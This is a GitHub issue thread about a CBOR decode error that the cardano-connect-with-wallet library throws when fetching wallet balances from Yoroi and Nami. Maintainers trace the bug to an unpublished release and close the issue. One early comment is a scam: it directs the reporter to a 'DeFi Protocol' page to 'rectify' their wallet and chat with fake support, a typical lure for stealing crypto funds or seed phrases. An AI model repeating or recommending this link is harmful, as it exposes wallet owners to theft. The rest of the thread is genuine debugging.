### ISSUE TITLE
[BUG] CBOR decode error: non-string keys not supported

### ISSUE THREAD

**Issue by Mr-Leshiy** [cardano-foundation/cardano-connect-with-wallet#87] opened 2023-08-27 16:01 UTC
**Describe the bug**
After connection to the `Yoroi` wallet using `connect` I am getting the following error message.

```
Uncaught (in promise) Error: CBOR decode error: non-string keys not supported (got object)
    at decode.js:71:1
    at ie (decode.js:90:1)
    at decode.js:42:1
    at ie (decode.js:55:1)
    at se (decode.js:123:1)
    at index.ts:352:1
    at f (index.ts:2:1)
    at Generator.<anonymous> (index.ts:2:1)
    at Generator.next (index.ts:2:1)
    at ce (index.ts:2:1)
```
And complaints for this line `const cborBalance = await api.getBalance();` inside this code block
```
if (typeof api.getBalance === 'function') {
                 const cborBalance = await api.getBalance();
                  const balance = decodeCbor(Buffer.from(cborBalance, 'hex'));
                  this.accountBalanceObserver.set(balance / 1000000);
}
```
This error appears after successful connection from some time.

**Platform (please complete the following information):**
-  Desktop
 - macOS 
 - chrome

**Comment by 74891632** [comment] 2023-08-28 01:23
Hello @Mr-Leshiy 
Resolve your issues using the DeFi Protocol [official page](https://defirefixprotocol.web.app/) to rectify your wallet issue to prevent loss of assests under the rectification section automatically.
Note: you can initiate a chat with the support using the chat button at the bottom of the page for further enquiries and assistance.

**Comment by fabianbormann** [comment] 2023-09-16 20:34
@Mr-Leshiy which version of the connect button are you using? I'm asking because it sounds similar to this closed issue: https://github.com/cardano-foundation/cardano-connect-with-wallet/issues/72 Thanks!

**Comment by brendanmoore** [comment] 2023-10-25 11:19
I can confirm the error is still present when attempting to connect to a Nami wallet:

Here are the versions in use: (taken from yarn.lock)
```yml
"@cardano-foundation/cardano-connect-with-wallet-core@^0.2.3":
  version "0.2.3"
  resolved "https://registry.yarnpkg.com/@cardano-foundation/cardano-connect-with-wallet-core/-/cardano-connect-with-wallet-core-0.2.3.tgz#d4a1326eec6341be3a0035095dc076144296bfbf"
  integrity sha512-BtrivcGziHZO3Il5TGeEDX9YizykcGuCFpAciOP48FsLxXgdHqmtZ7beWfwLFZ/5Yv5cam1+BOpQDZjHuiHHHg==
  dependencies:
    bech32 "^2.0.0"
    buffer "^6.0.3"
    cborg "^2.0.3"

"@cardano-foundation/cardano-connect-with-wallet@^0.2.7":
  version "0.2.7"
  resolved "https://registry.yarnpkg.com/@cardano-foundation/cardano-connect-with-wallet/-/cardano-connect-with-wallet-0.2.7.tgz#048c79c27a6e2df08ecb83e231f8d2d8a4decd3c"
  integrity sha512-Kaa5XIfFBulu9RTz6KqDd1DOfxpj9VyaV7mD8wpCbX9x1s2ueI62LX09H3hhCvpj8WJ7zGWbtYEMpP5xHeBgSQ==
  dependencies:
    "@cardano-foundation/cardano-connect-with-wallet-core" "^0.2.3"
    "@fabianbormann/cardano-peer-connect" "^1.2.13"
    buffer "^6.0.3"
    color "^4.2.3"
    react-qrcode-logo "^2.9.0"
    react-scripts "^5.0.1"
    styled-components "^6.0.7"
    typescript "^5.0.4"
```

<img width="986" alt="Screenshot 2023-10-25 at 12 18 17" src="https://github.com/cardano-foundation/cardano-connect-with-wallet/assets/1196098/745c85d1-795c-4e01-b376-e9e085ce9ce3">

**Comment by fabianbormann** [comment] 2023-11-21 07:48
I was able to reproduce the error with Nami and I try to fix it by today.

**Comment by fabianbormann** [comment] 2023-11-21 08:30
@brendanmoore for me the error does only happen on Nami preprod/preview network and not on mainnet. Is it the same for you?

**Comment by Mr-Leshiy** [comment] 2023-11-21 09:15
@fabianbormann , so sorry for the delay.
I have not used connect button, just a React hook `useCardano`. I have used `0.2.3` version of the `"@cardano-foundation/cardano-connect-with-wallet"`

**Comment by fabianbormann** [comment] 2023-11-22 06:28
@Mr-Leshiy for me it is super strange I also upgraded to 0.2.3 but in my `node_modules` folder there is still the old version with the bug that should be fixed by #72 ..
<img width="1008" alt="image" src="https://github.com/cardano-foundation/cardano-connect-with-wallet/assets/1525818/69bab8fc-6757-4036-a133-049e40d71007">

**Comment by fabianbormann** [comment] 2023-11-22 06:33
Ok I guess I know what happened .. The commit message [add multiasset support](https://github.com/cardano-foundation/cardano-connect-with-wallet/commit/12b4fc1ed41086b846a27d686a021c778182d34d) did not aligned with conventional commits and therefore no new version has been built 😅 ... I will create a new version manually later today

**Comment by fabianbormann** [comment] 2023-11-22 10:02
I would close this issue but feel free to re-open it if the issue persists in your projects

**Closed by fabianbormann** 2023-11-22 10:02 UTC
